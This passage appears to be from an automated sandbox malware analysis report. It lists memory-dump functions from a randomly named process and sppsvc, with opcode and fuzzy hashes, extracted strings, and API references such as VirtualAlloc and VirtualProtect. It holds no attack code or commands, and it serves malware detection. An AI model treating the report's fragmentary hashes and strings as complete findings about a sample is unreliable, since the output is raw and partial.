Instruction Fuzzy Hash: B601753591D789CFE712DB68C4441DD7FB0EF47314F1545E6C444DB292DA389649C781

Function 00007FFAACB97E12 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d4e42edab20a1f21d413d7558553304c12639b5e971fc0e389dca71ae29aaf
Instruction ID: b4210e38bf0e2e4691cb9554e48c6c8a59ffd4c626309df8f868002fcd48e4a2
Opcode Fuzzy Hash: 71d4e42edab20a1f21d413d7558553304c12639b5e971fc0e389dca71ae29aaf
Instruction Fuzzy Hash: 08F0963144E3C9DFE7038B70C8119D53FB8AF47204B1540E6E489CB0A2D62E5A1AD7A2

Function 00007FFAACB9CDB2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 269b4b2bf907760d0a3da38abba0baf1fef06bf3df8c767cea65f94b4b322d5d
Instruction ID: c2050eea0ac67241cd37fe59d40b60679ebdc2688632a3568fbb141a1502305b
Opcode Fuzzy Hash: 269b4b2bf907760d0a3da38abba0baf1fef06bf3df8c767cea65f94b4b322d5d
Instruction Fuzzy Hash: 7AF0903188E296DFE302DB70C8514E97FB4BF43214F1540F6D05ACB0A2DB2EA65AC7A1

Function 00007FFAACB9CA24 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff6c078167515c7853cd2acbf809afde88bb272280e0f37c5f5cf4c32faf135
Instruction ID: 1fbc4a7982f2b16a11dbf55fae3b6f752da78c81e824d9f08dce48677ac93a65
Opcode Fuzzy Hash: eff6c078167515c7853cd2acbf809afde88bb272280e0f37c5f5cf4c32faf135
Instruction Fuzzy Hash: A8012CB0D1DA699EEB98DF18C465BB8BBB0FB5A300F0440A9C04DD3682CB355A848F51

Function 00007FFAAC792AFB Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e5de8ccdf8286f6dadeaf2d6efd35b80732cbe9c530b69bda39aa860b86396
Instruction ID: f643df1ee9109a8ac973e663d75290314424a4b69631c5070dfffc9e2c9872e1
Opcode Fuzzy Hash: 35e5de8ccdf8286f6dadeaf2d6efd35b80732cbe9c530b69bda39aa860b86396
Instruction Fuzzy Hash: 9EF0FF30648A08CFDF58EF04C894EA9B7F1FBA9311F144559D44AD7260DA35E985CF81

Function 00007FFAAC794E05 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7211f2566b1a487dfb3b2bf0d4831ba7c81824aef09c1df1ca22df04f2918252
Instruction ID: e068e090a8e65459094aa1f5e6d27e1abd763ffaf669d3b6b2a58e1a434d75c8
Opcode Fuzzy Hash: 7211f2566b1a487dfb3b2bf0d4831ba7c81824aef09c1df1ca22df04f2918252
Instruction Fuzzy Hash: 2DF01931A1992ACFFBA0AB44C8557F872B1AB99310F0181B5C40DD72A1DE7DAA858A80

Function 00007FFAAC790C50 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e773b7aa68eea90c90b6b7a707db590c7e2d80dd506fe811c9ee40f2340bff
Instruction ID: 721f035820a83625d57143c09e2ca29df2d544f951d9c64dc4f15ef6516a1b11
Opcode Fuzzy Hash: 63e773b7aa68eea90c90b6b7a707db590c7e2d80dd506fe811c9ee40f2340bff
Instruction Fuzzy Hash: 8A018F3491E789CFE712DBA884841EDBFB0AF07314F1481E6C484CB292EA389A48C781

Function 00007FFAACB99588 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a672a5714acf18e4c5b33d45a45adc9c1826c07f6c4b8b817b551fc351ed5c
Instruction ID: f16ca3560dc06e8151d4d4634b542d740c5168d4fe1004aae7218b741f597643
Opcode Fuzzy Hash: 11a672a5714acf18e4c5b33d45a45adc9c1826c07f6c4b8b817b551fc351ed5c
Instruction Fuzzy Hash: 00F0BE10D0FA67CEFBA64B60E4112FA2B409F17300B65897AC64E861C2CF0FF80993D1

Function 00007FFAACB98A9A Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2277b4c7db0584a91a93e8cef0fc099aae14486180250971287dbb7d2abf62a
Instruction ID: b74227659048fecacfe9c6a2567197cd87d7319d8acebb2be4e53011a75d1b0a
Opcode Fuzzy Hash: d2277b4c7db0584a91a93e8cef0fc099aae14486180250971287dbb7d2abf62a
Instruction Fuzzy Hash: 6FF0962190E3968FFB229B748C914A87BE1DF17310B0946FAC44D8B1D7D66FA509C791

Function 00007FFAAC7906AD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c53c1e2ea84f6c7330e17efcff1e02f68ce73c8f1c1cab1b5a1bfe82c37ea7
Instruction ID: 9caf57b760551f2e13ab65ff7a34bf4a0bead04869215743c9dc8f4dc528b402
Opcode Fuzzy Hash: 72c53c1e2ea84f6c7330e17efcff1e02f68ce73c8f1c1cab1b5a1bfe82c37ea7
Instruction Fuzzy Hash: B6E04F07D6F52B8AF4E633FDA8460FC76205FCA624F958572D40C801C2AD0FA49E02E2

Function 00007FFAAC7910C0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085efdea68c9a54e740554c5b61c952f302fd5ffeca0d8d21cf5b00be0500b8b
Instruction ID: 348644cee86e1076c95174818edf7a1d22dd3b36554657d6ffc387e417283945
Opcode Fuzzy Hash: 085efdea68c9a54e740554c5b61c952f302fd5ffeca0d8d21cf5b00be0500b8b
Instruction Fuzzy Hash: 4DE02621A5CC590BFA6CB674A8615B17290DB46320B0945B9D01FC26C6CC0D8CC143C1

Function 00007FFAAC790845 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf92fcd0f418874c0afbe84ed012b096898b22d4bc33a971647e0e41fef12002
Instruction ID: 73291aadfc3d4e7b402e4689c049bff4f4a20efbac933959a7a5fd8011364304
Opcode Fuzzy Hash: bf92fcd0f418874c0afbe84ed012b096898b22d4bc33a971647e0e41fef12002
Instruction Fuzzy Hash: 5DE0C2267094519FD658B77DD8958DC7BA0EF06326B8640B1E04CC6162EA08D89BC391

Function 00007FFAAC791F58 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction ID: ea0dd3ed8da64b47cc77076ada0227b199fc62498d46f6880a4767a67928b2dc
Opcode Fuzzy Hash: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction Fuzzy Hash: BAE01A31E1A02A8FF7E4A724C8507B962B5AF89310F1080F4D50ED32D2CE2DED888B81

Function 00007FFAACB93437 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b00c9a443435433d65822fcf5efde90e7a704d219f6638d55cbfca8891bc9b
Instruction ID: a80be864988a5aae2c9f95402a0d888fb7b553d42d009105cbfeb0ff7bcd0cff
Opcode Fuzzy Hash: c5b00c9a443435433d65822fcf5efde90e7a704d219f6638d55cbfca8891bc9b
Instruction Fuzzy Hash: 67D0C201D0E395CFF7130778487107819908F1734071646B6D91D4A3C3DA4EA80893A2

Function 00007FFAAC796413 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 982575e4325b2489fd1ffb48bf0a58e9bdabff4775a45df38a92b95f7677d0ec
Instruction ID: da63ee6ea1e75fe273565842433d0d638fc6f53389a9b275df2296dbe8726002
Opcode Fuzzy Hash: 982575e4325b2489fd1ffb48bf0a58e9bdabff4775a45df38a92b95f7677d0ec
Instruction Fuzzy Hash: A3D0A905F0E69B4FF2A96334403AABA1F924F82200F0884F0E08DCB1A2CC0C290703CA

Function 00007FFAAC790B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction ID: 95b0b4cdee22713c2afbbd6ac931b1a9782650c12ec50cb1f27947eb2a4ed280
Opcode Fuzzy Hash: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction Fuzzy Hash: 3DC04C705218098FD944E72DC98595476B0FB1E315BD50190E40DCB271E65ADCD5C781

Function 00007FFAAC7925D6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a53064618eb168b0cf054342d63da9f97128de3538ada8001d0707439d01cd
Instruction ID: 35ba774d3c90e5f2e29bd5222e70f18d0f90cecde65a27a3dfe314059c7b002c
Opcode Fuzzy Hash: 85a53064618eb168b0cf054342d63da9f97128de3538ada8001d0707439d01cd
Instruction Fuzzy Hash: D4D01310D19559CFFEC4737440151BA15919F49320F408475DC0DC73C3DC2E9C4906C1

Function 00007FFAACB93F1B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0320fddf887d4cb9f89a615ede717bb0e45e7e2153b953a923008933622dd8
Instruction ID: 247f59de0b64d28ff0f209885856d34ad18d16ef38e149a2d82e1108bbfebd7d
Opcode Fuzzy Hash: dc0320fddf887d4cb9f89a615ede717bb0e45e7e2153b953a923008933622dd8
Instruction Fuzzy Hash: 8CD09210A1F6B7C6F9685705C1603BA65B05F12341E208439D05F41AC1CE1FF909A6C1

Function 00007FFAACB96AB5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1572119992.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaacb90000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: e81544770d567620db6cf9f7297fd0fd50148cab83bff31d1ee7b5cba3a9bf14
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: CBC04C30204914DFD784DB0DC0D863873D1EF5E301B5040B4E04ECF2A5C629DC499710

Function 00007FFAAC7963CD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a1fb8179b1a24948098eb3e75b730450719c00dd534724d48dabc0e2d66057
Instruction ID: 60f2fd59e148b65b6e267955c41fc29e7a906e37de8abb169bbfb4ed2ce14250
Opcode Fuzzy Hash: 15a1fb8179b1a24948098eb3e75b730450719c00dd534724d48dabc0e2d66057
Instruction Fuzzy Hash: FDC04C52F59A5E4BF2996324803577D08565F85704F94C4B5E04EC66D6CD1C590203C6

Function 00007FFAAC7906D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction ID: 64276f724ee65cd3fae229c3209337f3daa333d8028dbb53730d6045af249e98
Opcode Fuzzy Hash: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction Fuzzy Hash: BFB01210C7B44F44F49833BB094207874705B4A118FC44170D80C40181984F509C12C2

Function 00007FFAAC792D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.1561141506.00007FFAAC790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac790000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: eed42ee47d2e9dd9864c3a91f6c88f801cc67bfe6411d5097c230c9c94c9f525
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Analysis Process: TDdwNhXdQzDImnznNSm.exePID: 7960, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAAC7D0D47 Relevance: 1.5, Strings: 1, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5X_H, xrefs: 00007FFAAC7D0DF3

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac7d0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID: 5X_H
API String ID: 0-3241812158
Opcode ID: 285b7660363302c1c48e462c93c65a7accb1b920a7d3d88d4db93f475d9f5cc5
Instruction ID: 81cf3a69de76c41b41f700aea2901041e888a977137010aed2670de6cfb63a4d
Opcode Fuzzy Hash: 285b7660363302c1c48e462c93c65a7accb1b920a7d3d88d4db93f475d9f5cc5
Instruction Fuzzy Hash: B891E6B191CA898FE78ADB68C8697B87FE1FB97310F5440ABC04DD76D2CA785814C741

Function 00007FFAACBD977F Relevance: .7, Instructions: 704
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0904dc5b840547052f1db13e9f6485cf79f5cd9e13ecc5e6c3e2ab12c9a023ab
Instruction ID: e8fa2320638d46ce66cd5389117565a3ec5307d5d31bc047e2757682482acffc
Opcode Fuzzy Hash: 0904dc5b840547052f1db13e9f6485cf79f5cd9e13ecc5e6c3e2ab12c9a023ab
Instruction Fuzzy Hash: 2042AF70D09669CFEB59CB58C4907B8BBA1FF55300F1081BEC40EDB686DE39A885CB81

Function 00007FFAACBD7850 Relevance: 3.2, Strings: 2, Instructions: 691
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p]%, xrefs: 00007FFAACBD7AB8
0#%, xrefs: 00007FFAACBD79AA

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID: 0#%$p]%
API String ID: 0-2967677398
Opcode ID: c93ca8366659c503ef496671887143ad92ba234bc67e4ab9d8369cd3075711a3
Instruction ID: 6f7203d07545eae3ea4f3df7100fb29acbad565148d4033201858f2b9fecb1d9
Opcode Fuzzy Hash: c93ca8366659c503ef496671887143ad92ba234bc67e4ab9d8369cd3075711a3
Instruction Fuzzy Hash: 7732B730A19A29CFEB99DF18D895AB873E1FF55310B1441BAD00EDB296DE25EC45CBC0

Function 00007FFAAC7DB16A Relevance: 1.6, APIs: 1, Instructions: 141
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAAC7DB24D

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC7D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac7d4000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 953336bd75f59fe41cc130a2a5a780320b00f60ec234b0bffb976bd05583b911
Instruction ID: dfb56337aa9e93f4200469072c3d4244ae49b3e4b6a8637d967cf0ea685fe2ee
Opcode Fuzzy Hash: 953336bd75f59fe41cc130a2a5a780320b00f60ec234b0bffb976bd05583b911
Instruction Fuzzy Hash: 8241F93190D7898FE71A9BA898066E97FF0EF56321F0442AFD099C31A2DE746406C7D2

Function 00007FFAACBD92F8 Relevance: 1.4, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFAACBD9372

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0664da20ccf99cb88d5ef1b456af2cd7b339265a75f0699b302e311065a779cc
Instruction ID: 80ac2279a29217bcbf8088061bfcfc25d736b15870a7754263bab468b7b482a9
Opcode Fuzzy Hash: 0664da20ccf99cb88d5ef1b456af2cd7b339265a75f0699b302e311065a779cc
Instruction Fuzzy Hash: BE517071D0961ADFEB5ADB98C4546BDBBB1FF45300F1080BAC00EEB692DE35A905CB91

Function 00007FFAACBD4A48 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFAACBD4AB2

Memory Dump Source

Source File: 00000023.00000002.1601643435.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaacbd0000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 16e7d766fc79921572f524eb0d29342889478c1560f9a9541ae3e3fdc907e46c
Instruction ID: 9122d5adeaf4e1a478886c6f48b5515946797ca898f13efda17a158e2ff2d31f
Opcode Fuzzy Hash: 16e7d766fc79921572f524eb0d29342889478c1560f9a9541ae3e3fdc907e46c
Instruction Fuzzy Hash: 40514C71D0961ACFEB59DB98C4556FDB7B1EF45300F1080BAD01EEB686CE39A905CB84

Function 00007FFAAC7DC141 Relevance: 1.4, APIs: 1, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFAAC7DC1F4

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC7D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac7d4000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6bcf522412e5bf0e5cfb50062e23d5ae4a1c42bd664e6dfd491364a5360d3a76
Instruction ID: 59520b5a286b9b98ec5f8be1d2141f0a55b3e1ded5ab54e40cac2e2140f02cb0
Opcode Fuzzy Hash: 6bcf522412e5bf0e5cfb50062e23d5ae4a1c42bd664e6dfd491364a5360d3a76
Instruction Fuzzy Hash: 5631E97190CA4C8FDB19AB6898066F97BF0EF56321F00427FD04AC3552DA64A816CBC5

Function 00007FFAAC80AC10 Relevance: 1.4, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H;!, xrefs: 00007FFAAC80AC11

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID: H;!
API String ID: 0-999315778
Opcode ID: 3a973a43bc5ab2d92a5d6605bc1a9847894a1f23737e25f6b8cd3733464c08ba
Instruction ID: 9a5b815eeb3c7bc07ceea3107546ef3069ab7c5ee9e2f92e592b8472728ce9b8
Opcode Fuzzy Hash: 3a973a43bc5ab2d92a5d6605bc1a9847894a1f23737e25f6b8cd3733464c08ba
Instruction Fuzzy Hash: 2631F5A1A1994A9FF7E4E71894A56B836C2FB9D710F0A81B9D00EC3182DC28FC4583C1

Function 00007FFAAC800A11 Relevance: 1.3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFAAC8009C6

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 2b5e66f945b5808fbe58128dfe5d4fea3159a9366c2e6355849f8e25ed6161eb
Instruction ID: 18bf74b76125a4e960545dc150fde768823122b9cfffcd8d11e7022a82602f92
Opcode Fuzzy Hash: 2b5e66f945b5808fbe58128dfe5d4fea3159a9366c2e6355849f8e25ed6161eb
Instruction Fuzzy Hash: 6EF028B090F7C15FEB16A7794829414BFA0EE2B21174941FEC08BCF1A3D91D984AC741

Function 00007FFAAC80D764 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8e%, xrefs: 00007FFAAC80D765

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID: 8e%
API String ID: 0-1390493536
Opcode ID: 739bcbecde4004b0118546567304e15a89071234cf2c15820d282a69c7c58e04
Instruction ID: 964394a6d4c99b4ab760329821aceeabb09a0e81757c170e67c43cb9fb748845
Opcode Fuzzy Hash: 739bcbecde4004b0118546567304e15a89071234cf2c15820d282a69c7c58e04
Instruction Fuzzy Hash: 9C017131F0410ADFFBD4A66894457B973E0FB99312F044476D50EC6289DA28A94487C0

Function 00007FFAAC8009A9 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFAAC8009C6

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 8b09453eb525f330a970468a235fb0c0d72c09479b36dbd13c0322f599f74fed
Instruction ID: 14d2a6838a686f51f61c05f0ffb07dee409ff3ee92f4fde63616f0d9d561753c
Opcode Fuzzy Hash: 8b09453eb525f330a970468a235fb0c0d72c09479b36dbd13c0322f599f74fed
Instruction Fuzzy Hash: E9E0657190E7C04FC7169A7448684547FA0EF6721174951EEC046CF1A3EA2DD849C701

Function 00007FFAAC80AA39 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFAAC80AA56

Memory Dump Source

Source File: 00000023.00000002.1594241000.00007FFAAC800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffaac800000_TDdwNhXdQzDImnznNSm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: e0ca0b8c24536c78d3cbb91ee5c9a204d0b982b811ae17924ffad8d7fe873783
Instruction ID: 71a277da77a737c51d72ba96bd63715b552ab1b100c2544a7332b04df36f4cb8
Opcode Fuzzy Hash: e0ca0b8c24536c78d3cbb91ee5c9a204d0b982b811ae17924ffad8d7fe873783
Instruction Fuzzy Hash: 14E0126154F7C04FC756DB7488698547FA0EE6B21074A40EEC549CF1B3E62D9949C701

Function 00007FFAACBD6C09 Relevance: .5, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

